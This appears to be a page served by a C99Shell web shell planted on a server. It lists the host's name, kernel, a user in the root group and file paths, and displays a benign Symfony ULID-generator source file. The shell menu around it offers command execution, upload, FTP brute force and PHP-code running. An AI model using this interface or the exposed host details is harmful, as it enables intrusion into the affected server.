!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/vendor/symfony/uid/Command/   drwxr-xr-x
Free 28.77 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GenerateUlidCommand.php (3.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Uid\Command;

use 
Symfony\Component\Console\Attribute\AsCommand;
use 
Symfony\Component\Console\Command\Command;
use 
Symfony\Component\Console\Completion\CompletionInput;
use 
Symfony\Component\Console\Completion\CompletionSuggestions;
use 
Symfony\Component\Console\Input\InputInterface;
use 
Symfony\Component\Console\Input\InputOption;
use 
Symfony\Component\Console\Output\ConsoleOutputInterface;
use 
Symfony\Component\Console\Output\OutputInterface;
use 
Symfony\Component\Console\Style\SymfonyStyle;
use 
Symfony\Component\Uid\Factory\UlidFactory;

#[
AsCommand(name'ulid:generate'description'Generate a ULID')]
class 
GenerateUlidCommand extends Command
{
    private 
UlidFactory $factory;

    public function 
__construct(UlidFactory $factory null)
    {
        
$this->factory $factory ?? new UlidFactory();

        
parent::__construct();
    }

    protected function 
configure(): void
    
{
        
$this
            
->setDefinition([
                new 
InputOption('time'nullInputOption::VALUE_REQUIRED'The ULID timestamp: a parsable date/time string'),
                new 
InputOption('count''c'InputOption::VALUE_REQUIRED'The number of ULID to generate'1),
                new 
InputOption('format''f'InputOption::VALUE_REQUIREDsprintf('The ULID output format ("%s")'implode('", "'$this->getAvailableFormatOptions())), 'base32'),
            ])
            ->
setHelp(<<<'EOF'
The <info>%command.name%</info> command generates a ULID.

    <info>php %command.full_name%</info>

To specify the timestamp:

    <info>php %command.full_name% --time="2021-02-16 14:09:08"</info>

To generate several ULIDs:

    <info>php %command.full_name% --count=10</info>

To output a specific format:

    <info>php %command.full_name% --format=rfc4122</info>
EOF
            )
        ;
    }

    protected function 
execute(InputInterface $inputOutputInterface $output): int
    
{
        
$io = new SymfonyStyle($input$output instanceof ConsoleOutputInterface $output->getErrorOutput() : $output);

        if (
null !== $time $input->getOption('time')) {
            try {
                
$time = new \DateTimeImmutable($time);
            } catch (
\Exception $e) {
                
$io->error(sprintf('Invalid timestamp "%s": %s'$timestr_replace('DateTimeImmutable::__construct(): '''$e->getMessage())));

                return 
1;
            }
        }

        
$formatOption $input->getOption('format');

        if (
\in_array($formatOption$this->getAvailableFormatOptions())) {
            
$format 'to'.ucfirst($formatOption);
        } else {
            
$io->error(sprintf('Invalid format "%s", supported formats are "%s".'$formatOptionimplode('", "'$this->getAvailableFormatOptions())));

            return 
1;
        }

        
$count = (int) $input->getOption('count');
        try {
            for (
$i 0$i $count; ++$i) {
                
$output->writeln($this->factory->create($time)->$format());
            }
        } catch (
\Exception $e) {
            
$io->error($e->getMessage());

            return 
1;
        }

        return 
0;
    }

    public function 
complete(CompletionInput $inputCompletionSuggestions $suggestions): void
    
{
        if (
$input->mustSuggestOptionValuesFor('format')) {
            
$suggestions->suggestValues($this->getAvailableFormatOptions());
        }
    }

    private function 
getAvailableFormatOptions(): array
    {
        return [
            
'base32',
            
'base58',
            
'rfc4122',
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0072 ]--